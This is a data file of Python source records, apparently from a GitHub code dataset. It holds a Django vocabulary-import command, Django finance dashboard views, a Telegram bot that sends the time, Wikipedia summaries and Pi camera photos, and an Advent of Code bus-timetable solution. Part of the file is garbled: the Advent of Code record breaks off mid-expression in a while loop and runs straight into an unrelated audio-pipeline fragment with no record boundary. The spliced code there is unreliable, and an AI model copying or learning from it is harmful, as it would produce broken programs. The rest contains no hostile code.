result\n","repo_name":"rotoudjimaye/web-analytics","sub_path":"src/main/webapp/WEB-INF/jython-app/webanalytics/json_transforms.py","file_name":"json_transforms.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"7582189099","text":"\"\"\"\nImport json data from JSON file to Datababse\n\"\"\"\nimport os\nimport json\nfrom gogoedu.models import Catagory,Lesson,Word\nfrom django.core.management import BaseCommand\nfrom elearning.settings import BASE_DIR\n\n\nclass Command(BaseCommand):\n def import_vocab_from_file(self):\n data_folder = os.path.join(BASE_DIR, 'gogoedu', 'static/json_file/vocab')\n for data_file in os.listdir(data_folder):\n with open(os.path.join(data_folder, data_file), encoding='utf-8') as data_file:\n data = json.loads(data_file.read())\n catagory,createdCatagory=Catagory.objects.get_or_create(name=\"Kanji Genki\")\n for data_object in data:\n kana = data_object.get('Kana', None)\n kanji = data_object.get('Kanji', None)\n lesson = data_object.get('Lesson', None)\n mean = data_object.get('Meaning', None)\n try:\n lesson, created_lesson = Lesson.objects.get_or_create(\n name = lesson,\n catagory = catagory,\n )\n if created_lesson:\n lesson.save()\n display_format = \"\\nLesson, {}, has been saved.\"\n print(display_format.format(lesson))\n word, created_word = Word.objects.get_or_create(\n word=kana,\n mean=mean,\n kanji=kanji,\n catagory=catagory,\n )\n word.lesson.add(lesson)\n if created_word:\n word.save()\n display_format = \"\\nWord, {}, has been saved.\"\n print(display_format.format(word))\n except Exception as ex:\n print(str(ex))\n msg = \"\\n\\nSomething went wrong saving this Word: {}\\n{}\".format(kana, str(ex))\n print(msg)\n \n\n\n def handle(self, *args, **options):\n \"\"\"\n Call the function to import data\n \"\"\"\n self.import_vocab_from_file()","repo_name":"tuandang98/gogoedu","sub_path":"gogoedu/management/commands/import_vocab_from_json_file.py","file_name":"import_vocab_from_json_file.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"11850646185","text":"import decimal\nfrom datetime import datetime\n\nfrom django.db.models import Sum, F, Value, ExpressionWrapper, Q, Subquery, OuterRef, FloatField\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic import UpdateView, ListView, View\nfrom directory.models import PaymentAccount, CurrenciesRates, Counterparties, InitialDebts, Currencies\nfrom payments.models import PaymentDocuments\n\nfrom registers.forms import AccountSettingsSet, AccountBalancesFilter, DashboardFilter\nfrom registers.models import AccountSettings\nfrom registers.views_reports import AccountBalancesView\n\n\ndef htmx_projects(request):\n form = DashboardFilter(request.GET)\n return HttpResponse(form[\"project\"])\n\n\nclass DashboardView(View):\n def get(self, request):\n main_currency = AccountSettings.load().currency()\n form = DashboardFilter(request.GET)\n accounts = PaymentAccount.objects.all()\n\n paydocs = PaymentDocuments.objects.all().annotate(amount_convert=F('inflow_amount')+F('outflow_amount'))\n #paydocs = []\n rates = {main_currency.id: decimal.Decimal(1)}\n for doc in paydocs:\n if doc.currency_id not in rates:\n rates[doc.currency_id] = (\n CurrenciesRates.objects.filter(\n accounting_currency=main_currency,\n currency=F('currency__id'),\n date__lte=datetime.now(),\n ).order_by('-date')[:1].first().rate\n )\n # doc.amount_convert=(doc.inflow_amount + doc.outflow_amount) / rates[doc.currency_id]\n doc.amount_convert /= rates[doc.currency_id]\n\n print(doc.date, doc.inflow_amount, doc.outflow_amount, doc.currency, doc.amount_convert)\n\n paydocs_before = paydocs\n\n if form.is_valid():\n if form.cleaned_data['organization']:\n accounts = accounts.filter(organization=form.cleaned_data['organization'])\n paydocs = paydocs.filter(organization=form.cleaned_data['organization'])\n paydocs_before = paydocs_before.filter(organization=form.cleaned_data['organization'])\n if form.cleaned_data['date_start']:\n paydocs = paydocs.filter(date__gte=form.cleaned_data['date_start'])\n if form.cleaned_data['date_end']:\n paydocs = paydocs.filter(date__lte=form.cleaned_data['date_end'])\n paydocs_before = paydocs_before.filter(date__lte=form.cleaned_data['date_start'])\n\n cf_table, cf_bar = self.get_cf_table(paydocs)\n\n context = {\n 'form': form,\n 'today': datetime.today(),\n 'main_currency': main_currency,\n 'account_balances': self.get_balances(accounts, paydocs_before),\n 'cf_table': cf_table,\n 'cf_bar': cf_bar,\n 'cf_dynamics': self.get_cf_dynamics(paydocs),\n }\n\n return render(request, 'registers/dashboard.html', context=context)\n\n # chart 1: account balances\n @staticmethod\n def get_balances(accounts, paydocs_before):\n account_balances = {}\n accounts = accounts.values_list('account', flat=True).distinct()\n\n for acc in accounts:\n currency = PaymentAccount.objects.filter(account=acc).values_list('currency__code', flat=True)[0]\n\n receipts = paydocs_before.filter(account__account=acc)\n receipts_sum = receipts.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_sum is None:\n receipts_sum = 0\n\n payments = paydocs_before.filter(account__account=acc)\n payments_sum = payments.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_sum is None:\n payments_sum = 0\n\n final_balance = receipts_sum - payments_sum\n account_balances[acc] = [int(final_balance), currency]\n\n account_balances = [[k, *v] for k, v in account_balances.items()]\n\n return account_balances\n\n 
@staticmethod\n def get_amount_sum(paydocs):\n amount_sum = paydocs.aggregate(Sum(\"amount_convert\")).get('amount_convert__sum', 0.00)\n if amount_sum is None:\n amount_sum = 0\n return amount_sum\n\n # chart 2, 3 cf table and cf bar\n def get_cf_table(self, paydocs):\n cf_table = {}\n\n receipts_total = paydocs.filter(flow='Receipts')\n payments_total = paydocs.filter(flow='Payments')\n receipts_oper = paydocs.filter(item__activity='operating', flow='Receipts')\n payments_oper = paydocs.filter(item__activity='operating', flow='Payments')\n receipts_invest = paydocs.filter(item__activity='investing', flow='Receipts')\n payments_invest = paydocs.filter(item__activity='investing', flow='Payments')\n receipts_fin = paydocs.filter(item__activity='financing', flow='Receipts')\n payments_fin = paydocs.filter(item__activity='financing', flow='Payments')\n\n receipts_sum = self.get_amount_sum(receipts_total)\n payments_sum = self.get_amount_sum(payments_total)\n receipts_oper_sum = self.get_amount_sum(receipts_oper)\n payments_oper_sum = self.get_amount_sum(payments_oper)\n receipts_invest_sum = self.get_amount_sum(receipts_invest)\n payments_invest_sum = self.get_amount_sum(payments_invest)\n receipts_fin_sum = self.get_amount_sum(receipts_fin)\n payments_fin_sum = self.get_amount_sum(payments_fin)\n\n cf = receipts_sum - payments_sum\n cf_oper = receipts_oper_sum - payments_oper_sum\n cf_invest = receipts_invest_sum - payments_invest_sum\n cf_fin = receipts_fin_sum - payments_fin_sum\n\n cf_table['receipts'] = [int(receipts_oper_sum), int(receipts_invest_sum), int(receipts_fin_sum),\n int(receipts_sum)]\n cf_table['payments'] = [int(payments_oper_sum), int(payments_invest_sum), int(payments_fin_sum),\n int(payments_sum)]\n cf_table['cash flow'] = [int(cf_oper), int(cf_invest), int(cf_fin), int(cf)]\n\n cf_table = [[k, *v] for k, v in cf_table.items()]\n\n cf_total = cf_table[2][1] + cf_table[2][2] + cf_table[2][3]\n\n cf_bar = [['Operating', cf_table[2][1]], ['Investment', cf_table[2][2]],\n ['Financing', cf_table[2][3]], ['Total', cf_total]]\n\n return cf_table, cf_bar\n\n # function for getting full data\n @staticmethod\n def get_dynamics(paydocs):\n dynamics = {}\n for paydoc in paydocs:\n month = str(paydoc.date.month).rjust(2, '0')\n period = f'{str(paydoc.date.year)}/{month}'\n amount = float(paydoc.amount_convert)\n if period not in dynamics:\n dynamics[period] = amount\n else:\n dynamics[period] += amount\n\n return dynamics\n\n # get dynamics of receipts and payments\n def get_cf_dynamics(self, paydocs):\n payments = paydocs.filter(flow='Payments')\n receipts = paydocs.filter(flow='Receipts')\n receipts_dynamics = self.get_dynamics(receipts)\n for k, v in receipts_dynamics.items():\n receipts_dynamics[k] = int(v)\n payments_dynamics = self.get_dynamics(payments)\n for k, v in payments_dynamics.items():\n payments_dynamics[k] = int(v * (-1))\n\n total_cf = {k: [receipts_dynamics.get(k, 0), payments_dynamics.get(k, 0)]\n for k in set(receipts_dynamics) | set(payments_dynamics)}\n total_cf = sorted(total_cf.items(), key=lambda x: x[0])\n total_cf = dict(total_cf)\n\n cf_dynamics = []\n for k, v in total_cf.items():\n cf_dynamics.append([k, *v, v[0] + v[1]])\n\n return cf_dynamics\n\n\nclass ChartsOperView(View):\n def get(self, request):\n main_currency = AccountSettings.load().currency()\n form = DashboardFilter(request.GET)\n receipts = PaymentDocuments.objects.filter(flow='Receipts', item__activity='operating')\n payments = PaymentDocuments.objects.filter(flow='Payments', 
item__activity='operating')\n\n if form.is_valid():\n if form.cleaned_data['organization']:\n receipts = receipts.filter(organization=form.cleaned_data['organization'])\n payments = payments.filter(organization=form.cleaned_data['organization'])\n if form.cleaned_data['project']:\n receipts = receipts.filter(project=form.cleaned_data['project'])\n payments = payments.filter(project=form.cleaned_data['project'])\n if form.cleaned_data['date_start']:\n receipts = receipts.filter(date__gte=form.cleaned_data['date_start'])\n payments = payments.filter(date__gte=form.cleaned_data['date_start'])\n if form.cleaned_data['date_end']:\n receipts = receipts.filter(date__lte=form.cleaned_data['date_end'])\n payments = payments.filter(date__lte=form.cleaned_data['date_end'])\n\n rp_dynamics = self.get_rp_dynamics(receipts, payments)\n\n context = {\n 'form': form,\n 'today': datetime.today(),\n 'main_currency': main_currency,\n 'payments_bar': self.get_bar_payments(payments),\n 'receipts_structure': self.get_structure(receipts),\n 'payments_structure': self.get_structure(payments),\n 'rp_dynamics': rp_dynamics,\n 'top_customers': self.get_bar_top10(receipts, 'Receipts'),\n 'top_suppliers': self.get_bar_top10(payments, 'Payments'),\n }\n\n return render(request, 'registers/charts_oper.html', context=context)\n\n # charts 1, 2, 4\n def get_structure(self, doc):\n main_currency = AccountSettings.load().currency()\n data = {}\n for i in doc:\n rate = float(AccountBalancesView.get_rate(i.currency, main_currency))\n item = str(i.item)\n amount = float(i.inflow_amount) / rate if i.inflow_amount != 0 else float(i.outflow_amount) / rate\n\n if item not in data:\n data[item] = int(amount)\n else:\n data[item] += int(amount)\n\n data_sort = sorted(data.items(), key=lambda x: x[1], reverse=True)\n data_sort = dict(data_sort)\n structure = [[k, v] for k, v in data_sort.items()]\n\n return structure\n\n # function for data payments and payments\n @staticmethod\n def get_dynamics(doc):\n main_currency = AccountSettings.load().currency()\n dynamics = {}\n for i in doc:\n rate = float(AccountBalancesView.get_rate(i.currency, main_currency))\n month = str(i.date.month).rjust(2, '0')\n period = f'{str(i.date.year)}/{month}'\n amount = float(i.inflow_amount) / rate if i.inflow_amount != 0 else float(i.outflow_amount) / rate\n if period not in dynamics:\n dynamics[period] = int(amount)\n else:\n dynamics[period] += int(amount)\n\n return dynamics\n\n # get data payments and payments for chart 3\n def get_total_cf(self, receipts, payments):\n payments_dynamics = self.get_dynamics(payments)\n receipts_dynamics = self.get_dynamics(receipts)\n\n total_cf = {k: [receipts_dynamics.get(k, 0), payments_dynamics.get(k, 0)]\n for k in set(receipts_dynamics) | set(payments_dynamics)}\n total_cf = sorted(total_cf.items(), key=lambda x: x[0])\n total_cf = dict(total_cf)\n\n return total_cf\n\n # chart 3 Dynamics of payments and payments\n def get_rp_dynamics(self, receipts, payments):\n total_cf = self.get_total_cf(receipts, payments)\n rp_dynamics = []\n for k, v in total_cf.items():\n rp_dynamics.append([k, *v])\n\n return rp_dynamics\n\n # chart 5 Payments bar by group\n @staticmethod\n def get_bar_payments(paydocs):\n main_currency = AccountSettings.load().currency()\n data = {}\n for i in paydocs:\n rate = float(AccountBalancesView.get_rate(i.currency, main_currency))\n items_group = str(i.item.group)\n amount = float(i.inflow_amount) / rate if i.inflow_amount != 0 else float(i.outflow_amount) / rate\n if items_group not in 
data:\n data[items_group] = amount\n else:\n data[items_group] += amount\n data_sort = sorted(data.items(), key=lambda x: x[1], reverse=True)\n structure = dict(data_sort)\n\n return [[k, v] for k, v in structure.items()]\n\n # chart 6, 7 TOP-10 counterparty\n @staticmethod\n def get_bar_top10(paydocs, flow):\n main_currency = AccountSettings.load().currency()\n if flow == 'Receipts':\n counterparties = Counterparties.objects.filter(customer=True).values_list('id', flat=True)\n else:\n counterparties = Counterparties.objects.filter(suppliers=True).values_list('id', flat=True)\n data = {}\n paydocs_sum = (\n paydocs\n .filter(counterparty__in=counterparties)\n .annotate(amount_sum=Sum(\"inflow_amount\") + Sum(\"outflow_amount\"))\n .order_by('counterparty', 'currency', 'amount_sum')\n .values('counterparty__counterparty', 'currency', 'amount_sum')\n )\n counterparty = None\n for doc_sum in paydocs_sum:\n cp = doc_sum['counterparty__counterparty']\n if counterparty != cp:\n counterparty = cp\n data[cp] = 0.0\n rate = AccountBalancesView.get_rate(doc_sum['currency'], main_currency)\n data[cp] += int(float(doc_sum['amount_sum']) / (float(rate) or 1.0))\n\n data_sort = sorted(data.items(), key=lambda x: x[1], reverse=True)\n top10 = dict(data_sort)\n\n return [[k, v] for k, v in top10.items()][:10]\n\n\nclass ChartsFinView(View):\n main_currency = AccountSettings.load().currency()\n\n def get(self, request):\n form = DashboardFilter(request.GET)\n currencies = Currencies.objects.all()\n agents = Counterparties.objects.all()\n initial_debts = InitialDebts.objects.all()\n paydocs = PaymentDocuments.objects.filter(item__activity='financing') \\\n .annotate(amount=F('inflow_amount') + F('outflow_amount'),\n rate=Value(AccountBalancesView.get_rate(F('currency__id'), self.main_currency)),\n amount_convert=(F('amount') / F('rate')))\n\n # for i in paydocs:\n # print(i.date, i.currency, i.rate, i.amount_convert)\n\n paydocs_before = paydocs\n\n if form.is_valid():\n if form.cleaned_data['organization']:\n paydocs = paydocs.filter(organization=form.cleaned_data['organization'])\n paydocs_before = paydocs_before.filter(organization=form.cleaned_data['organization'])\n initial_debts = initial_debts.filter(organization=form.cleaned_data['organization'])\n if form.cleaned_data['date_start']:\n paydocs = paydocs.filter(date__gte=form.cleaned_data['date_start'])\n paydocs_before = paydocs_before.filter(date__gte=form.cleaned_data['date_start'])\n else:\n paydocs_before = PaymentDocuments.objects.none()\n if form.cleaned_data['date_end']:\n paydocs = paydocs.filter(date__lte=form.cleaned_data['date_end'])\n paydocs_before = paydocs_before.filter(date__lte=form.cleaned_data['date_end'])\n\n # credit_portfolio = self.get_loan_portfolio(agents, paydocs, initial_debts)\n # debit_portfolio = self.get_loan_portfolio(agents, paydocs, initial_debts)\n loans_table = self.get_loan_tables(agents, currencies, paydocs, paydocs_before, initial_debts)\n\n context = {\n 'form': form,\n 'today': datetime.today(),\n 'loans_table': loans_table,\n # 'credit_portfolio': credit_portfolio,\n # 'debit_portfolio': debit_portfolio,\n # 'cf_fin_dynamics': self.get_cf_dynamics(paydocs),\n }\n\n return render(request, 'registers/charts_fin.html', context=context)\n\n # chart loans_table\n def get_loan_tables(self, agents, currencies, paydocs, paydocs_before, initial_debts, ):\n loans_table = []\n print(initial_debts)\n for agent in agents:\n agent_name = str(agent)\n initial_debts = initial_debts.filter(counterparty=agent)\n paydocs = 
paydocs.filter(counterparty=agent)\n paydocs_before = paydocs_before.filter(counterparty=agent)\n for currency in currencies:\n currency_name = str(currency)\n initial_debt = initial_debts.filter(currency=currency)\n debit = initial_debt.aggregate(Sum(\"debit\")).get('debit__sum', 0.00)\n if debit is None:\n debit = 0.0\n credit = initial_debt.aggregate(Sum(\"credit\")).get('credit__sum', 0.00)\n if credit is None:\n credit = 0.0\n initial_debt = debit - credit\n\n # print(f'initial - {agent.counterparty}: {initial_debt}')\n\n receipts = paydocs.filter(flow='Receipts', currency=currency)\n receipts_sum = receipts.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_sum is None:\n receipts_sum = 0\n\n receipts_before = paydocs_before.filter(flow='Receipts', currency=currency)\n receipts_before_sum = receipts_before.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_before_sum is None:\n receipts_before_sum = 0\n\n payments = paydocs.filter(flow='Payments', currency=currency)\n payments_sum = payments.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_sum is None:\n payments_sum = 0\n\n payments_before = paydocs_before.filter(flow='Payments', currency=currency)\n payments_before_sum = payments_before.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_before_sum is None:\n payments_before_sum = 0\n\n start_balance = int(initial_debt) + int(receipts_before_sum) - int(payments_before_sum)\n start_debit = abs(start_balance) if start_balance > 0 else 0\n start_credit = abs(start_balance) if start_balance < 0 else 0\n\n final_balance = int(initial_debt) - int(payments_sum) + int(receipts_sum)\n final_debit = abs(final_balance) if final_balance > 0 else 0\n final_credit = abs(final_balance) if final_balance < 0 else 0\n\n loans_table.append([agent_name, int(start_debit), int(start_credit), int(receipts_sum),\n int(payments_sum), int(final_debit), int(final_credit), currency_name])\n\n print(f'table - {loans_table}')\n return loans_table\n\n # charts portfolios\n def get_loan_portfolio(self, agents, paydocs, initial_debts):\n portfolio = []\n for agent in agents:\n initial_debts = initial_debts.filter(counterparty=agent)\n print(f' the {initial_debts}')\n if initial_debts is None:\n initial_debts.credit = 0\n initial_debts.debit = 0\n # if initial_debts.debit is None:\n\n receipts = paydocs.filter(counterparty=agent)\n receipts_sum = receipts.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_sum is None:\n receipts_sum = 0\n payments = paydocs.filter(counterparty=agent)\n payments_sum = payments.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_sum is None:\n payments_sum = 0\n\n open_balance = 0 # agent.credit - agent.debit\n final_balance = abs(open_balance + receipts_sum - payments_sum)\n agent = str(agent)\n\n portfolio.append([agent, int(final_balance)])\n\n return portfolio\n\n # function for getting full data\n @staticmethod\n def get_dynamics(paydocs):\n dynamics = {}\n for paydoc in paydocs:\n month = str(paydoc.date.month).rjust(2, '0')\n period = f'{str(paydoc.date.year)}/{month}'\n amount = float(paydoc.inflow_amount) if paydoc.inflow_amount != 0 else float(paydoc.outflow_amount)\n if period not in dynamics:\n dynamics[period] = amount\n else:\n dynamics[period] += amount\n\n return dynamics\n\n # get data payments and payments\n def get_total_cf(self, paydocs):\n payments_dynamics = 
self.get_dynamics(paydocs)\n receipts_dynamics = self.get_dynamics(paydocs)\n\n total_cf = {k: [receipts_dynamics.get(k, 0), payments_dynamics.get(k, 0)]\n for k in set(receipts_dynamics) | set(payments_dynamics)}\n total_cf = sorted(total_cf.items(), key=lambda x: x[0])\n total_cf = dict(total_cf)\n\n return total_cf\n\n # chart 4 total cash flow\n def get_cf_dynamics(self, paydocs):\n total_cf = self.get_total_cf(paydocs)\n cf_dynamics = []\n for k, v in total_cf.items():\n cf_dynamics.append([k, *v, v[0] - v[1]])\n\n return cf_dynamics\n\n\ndef ChartsInvestView(request):\n pass\n\n\nclass ChartsFinView1(View):\n def get(self, request):\n form = DashboardFilter(request.GET)\n\n lenders = InitialDebts.objects.filter(type_debt='Lender')\n borrowers = InitialDebts.objects.filter(type_debt='Borrower')\n\n receipts = PaymentDocuments.objects.filter(flow='Receipts', item__activity='financing')\n payments = PaymentDocuments.objects.filter(flow='Payments', item__activity='financing')\n receipts_before = receipts\n payments_before = payments\n\n if form.is_valid():\n if form.cleaned_data['organization']:\n receipts = receipts.filter(organization=form.cleaned_data['organization'])\n payments = payments.filter(organization=form.cleaned_data['organization'])\n lenders = lenders.filter(organization=form.cleaned_data['organization'])\n borrowers = borrowers.filter(organization=form.cleaned_data['organization'])\n\n if form.cleaned_data['date_start']:\n receipts = receipts.filter(date__gte=form.cleaned_data['date_start'])\n payments = payments.filter(date__gte=form.cleaned_data['date_start'])\n receipts_before = receipts_before.filter(date__lte=form.cleaned_data['date_start'])\n payments_before = payments_before.filter(date__lte=form.cleaned_data['date_start'])\n else:\n receipts_before = PaymentDocuments.objects.none()\n payments_before = PaymentDocuments.objects.none()\n if form.cleaned_data['date_end']:\n receipts = receipts.filter(date__lte=form.cleaned_data['date_end'])\n payments = payments.filter(date__lte=form.cleaned_data['date_end'])\n\n loan_portfolio = self.get_loan_portfolio(lenders, receipts, payments)\n debit_portfolio = self.get_loan_portfolio(borrowers, receipts, payments)\n lenders_table = self.get_tables(lenders, receipts, payments, receipts_before, payments_before)\n borrowers_table = self.get_tables(borrowers, receipts, payments, receipts_before, payments_before)\n\n context = {\n 'form': form,\n 'today': datetime.today(),\n 'loan_portfolio': loan_portfolio,\n 'debit_portfolio': debit_portfolio,\n 'cf_fin_dynamics': self.get_cf_dynamics(receipts, payments),\n 'lenders_table': lenders_table,\n 'borrowers_table': borrowers_table,\n }\n\n return render(request, 'registers/charts_fin.html', context=context)\n\n # charts 1, 2 portfolios\n\n def get_loan_portfolio(self, agents, receipts, payments):\n portfolio = []\n for agent in agents:\n if agent.credit is None:\n agent.credit = 0\n if agent.debit is None:\n agent.debit = 0\n receipts = receipts.filter(counterparty=agent.counterparty)\n receipts_sum = receipts.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_sum is None:\n receipts_sum = 0\n payments = payments.filter(counterparty=agent.counterparty)\n payments_sum = payments.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_sum is None:\n payments_sum = 0\n\n open_balance = agent.credit - agent.debit\n final_balance = abs(open_balance + receipts_sum - payments_sum)\n agent = str(agent.counterparty)\n\n 
portfolio.append([agent, int(final_balance)])\n print(agents)\n print(portfolio)\n return portfolio\n\n # chart 4, 5: agents_table\n def get_tables(self, agents, receipts, payments, receipts_before, payments_before):\n agents_table = []\n\n for agent in agents:\n receipts = receipts.filter(counterparty=agent.counterparty)\n receipts_sum = receipts.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_sum is None:\n receipts_sum = 0\n\n receipts_before = receipts_before.filter(counterparty=agent.counterparty)\n receipts_before_sum = receipts_before.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_before_sum is None:\n receipts_before_sum = 0\n\n payments = payments.filter(counterparty=agent.counterparty)\n payments_sum = payments.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_sum is None:\n payments_sum = 0\n\n payments_before = payments_before.filter(counterparty=agent.counterparty)\n payments_before_sum = payments_before.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_before_sum is None:\n payments_before_sum = 0\n\n start_balance = agent.debit - agent.credit + receipts_before_sum - payments_before_sum\n start_debit = abs(start_balance) if start_balance > 0 else 0\n start_credit = abs(start_balance) if start_balance < 0 else 0\n\n final_balance = agent.debit - agent.credit - receipts_sum + payments_sum\n final_debit = abs(final_balance) if final_balance > 0 else 0\n final_credit = abs(final_balance) if final_balance < 0 else 0\n agent = str(agent.counterparty)\n\n agents_table.append([agent, int(start_debit), int(start_credit), int(receipts_sum),\n int(payments_sum), int(final_debit), int(final_credit)])\n\n print(agents_table)\n return agents_table\n\n # function for getting full data\n @staticmethod\n def get_dynamics(flow):\n dynamics = {}\n for i in flow:\n month = str(i.date.month).rjust(2, '0')\n period = f'{str(i.date.year)}/{month}'\n amount = float(i.inflow_amount) if i.inflow_amount != 0 else float(i.outflow_amount)\n if period not in dynamics:\n dynamics[period] = amount\n else:\n dynamics[period] += amount\n\n return dynamics\n\n # get receipts and payments data\n def get_total_cf(self, payments, receipts):\n receipts_dynamics = self.get_dynamics(receipts)\n payments_dynamics = self.get_dynamics(payments)\n\n total_cf = {k: [receipts_dynamics.get(k, 0), payments_dynamics.get(k, 0)]\n for k in set(receipts_dynamics) | set(payments_dynamics)}\n total_cf = sorted(total_cf.items(), key=lambda x: x[0])\n total_cf = dict(total_cf)\n\n return total_cf\n\n # chart 4 total cash flow\n def get_cf_dynamics(self, payments, receipts):\n total_cf = self.get_total_cf(payments, receipts)\n cf_dynamics = []\n for k, v in total_cf.items():\n cf_dynamics.append([k, *v, v[0] - v[1]])\n\n return cf_dynamics\n\n\n\n","repo_name":"Alata9/EnterpriseFinance","sub_path":"registers/views_charts.py","file_name":"views_charts.py","file_ext":"py","file_size_in_byte":28392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
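The various get_dynamics() helpers above all rely on the same 'YYYY/MM' bucketing before sorting by period key; a self-contained sketch of that aggregation step:

import datetime

docs = [(datetime.date(2023, 1, 5), 10.0), (datetime.date(2023, 1, 20), 5.0),
        (datetime.date(2023, 2, 1), 7.5)]
dynamics = {}
for day, amount in docs:
    period = f"{day.year}/{str(day.month).rjust(2, '0')}"
    dynamics[period] = dynamics.get(period, 0.0) + amount
print(dict(sorted(dynamics.items())))  # {'2023/01': 15.0, '2023/02': 7.5}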
+{"seq_id":"45382424178","text":"# -*- coding: utf-8 -*-\n\nimport telebot # Librería de la API del bot.\nfrom telebot import types # Tipos para la API del bot.\nimport time # Librería para hacer que el programa que controla el bot no se acabe.\nimport wikipedia\nimport picamera\nfrom time import sleep\nTOKEN = 'Aquí va el tokken' # Nuestro tokken del bot (el que @BotFather nos dió).\n\nbot = telebot.TeleBot(TOKEN) # Creamos el objeto de nuestro bot.\n@bot.message_handler(commands=['hora']) # Indicamos que lo siguiente va a controlar el comando '/hora'.\ndef command_hora(m): # Definimos una función que resuelva lo que necesitemos.\n cid = m.chat.id # Guardamos el ID de la conversación para poder responder.\n bot.send_message( cid, time.strftime(\"%H:%M:%S\")) # Con la función 'send_message()' del bot, enviamos al ID almacenado el texto que queremos.\n@bot.message_handler(commands=['prueba']) # Indicamos que lo siguiente va a controlar el comando '/prueba'\ndef command_prueba(m): # Definimos una función que resuleva lo que necesitemos.\n cid = m.chat.id # Guardamos el ID de la conversación para poder responder.\n bot.send_message( cid, 'probando') # Con la función 'send_message()' del bot, enviamos al ID almacenado el texto que queremos.\n@bot.message_handler(commands=['wiki'])\ndef command_wiki(m):\n cid = m.chat.id\n msg = m.text[6:]\n if msg =='':\n bot.send_message(cid, \"Escribe algo despues de /wiki\")\n else :\n try:\n bot.send_message(cid,wikipedia.summary(msg, sentences=6))\n except wikipedia.exceptions.DisambiguationError as e:\n bot.send_message(cid, e)\n@bot.message_handler(commands=['picamera'])\ndef command_picamera(m):\n cid = m.chat.id\n msg = m.text[6:]\n try:\n with picamera.PiCamera() as camera:\n# camera.hflip = True\n# camera.vflip = True\n camera.capture(\"imagen.jpg\")\n sleep(1)\n photo = open('imagen.jpg', 'rb')\n bot.send_photo(cid, photo)\n except :\n bot.send_message(cid, \"Fallo al arrancar la camara, prueba mas tarde\")\n\nbot.polling(none_stop=True) # Con esto, le decimos al bot que siga funcionando incluso si encuentra algún fallo.\n","repo_name":"inakidml/PiCameraToTelegramBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"3012645754","text":"with open(\"input\") as file:lines = file.read().splitlines()\n\nwhen=int(lines[0])\nbuses= list(map(int,list(filter(lambda b: b!=\"x\", lines[1].split(\",\")))))\n\nwait=0\nfound=False\nwhile not(found):\n for b in buses:\n if (when%b==0):\n found=True\n break\n else:\n wait+=1\n when+=1\n\nprint(\"part 1: \",wait*b)\nprint()\n\n#part 2\n\n#copy paste from somewhere\ndef gcd(a,b):\n \"\"\"Compute the greatest common divisor of a and b\"\"\"\n while b > 0:\n a, b = b, a % b\n return a\n \ndef lcm(a, b):\n \"\"\"Compute the lowest common multiple of a and b\"\"\"\n return a * b / gcd(a, b)\n##\n\nbusesAll = lines[1].split(\",\")\n\nbig = max(buses)\nwhen=0\n\nbigIndex=busesAll.index(str(big))\n\nbusesWithIndexDiffs={}\nindexDiffFromFirstAndBig=\"\"\n\nfor i in range(len(busesAll)):\n if (busesAll[i]!=\"x\"):\n if(int(busesAll[i])!=big):\n busesWithIndexDiffs[int(busesAll[i])] = -(bigIndex-i)\n if indexDiffFromFirstAndBig==\"\":\n indexDiffFromFirstAndBig=-(bigIndex-i)\n\n#print(busesWithIndexDiffs)\n\nfound=set([big])\nincr=big\nwhile len(found)= 2:\n wfs = wfs[:, 0]\n return wfs\n\n\ndefault_mall = dict(\n # Factory Input Stores\n sound_output={k: v for k, v in upload_files_store.getter_items()},\n step_factories=dict(\n # ML\n chunker=FuncFactory(simple_chunker),\n featurizer=FuncFactory(simple_featurizer),\n ),\n # Output Store\n data=dict(),\n steps={k: v for k, v in pipeline_step_store.getter_items()},\n pipelines=dict(),\n exec_outputs=dict(),\n learned_models=dict(),\n models_scores=dict(),\n source=None,\n)\n\nmall = get_mall(defaults=default_mall)\ncrudifier = partial(Crudifier, mall=mall)\n\n\n@add_to_upload_files_store\n@crudifier(output_store='sound_output')\ndef upload_sound(train_audio: List[WaveForm], tag: str):\n return train_audio, tag\n\n\ndef get_step_name(step):\n return [k for k, v in get_mall()['steps'].items() if v == step][0]\n\n\ndef _save_name_getter(args, kwargs, function=None, return_value=None):\n return kwargs['save_name']\n\n\n@Persist.function_call(key_getter=_save_name_getter, store=pipeline_step_store)\n@crudifier(param_to_mall_map=dict(step_factory='step_factories'), output_store='steps')\ndef mk_step(step_factory: Callable, kwargs: dict):\n kwargs = clean_dict(kwargs)\n step = partial(step_factory, **kwargs)()\n\n return step\n\n\ndef get_selected_step_factory_sig():\n selected_step_factory = get_mall()['step_factories'].get(\n b.selected_step_factory.get()\n )\n if selected_step_factory:\n return Sig(selected_step_factory)\n\n\n@crudifier(output_store='pipelines',)\n@resolve_item_getter_args\ndef mk_pipeline(steps: Iterable[Callable]):\n return LineParametrized(*steps)\n\n\n@crudifier(\n param_to_mall_map=dict(tagged_data='sound_output', preprocess_pipeline='pipelines'),\n output_store='learned_models',\n)\n@UploadFilesStore.resolve_item_getter_args\ndef 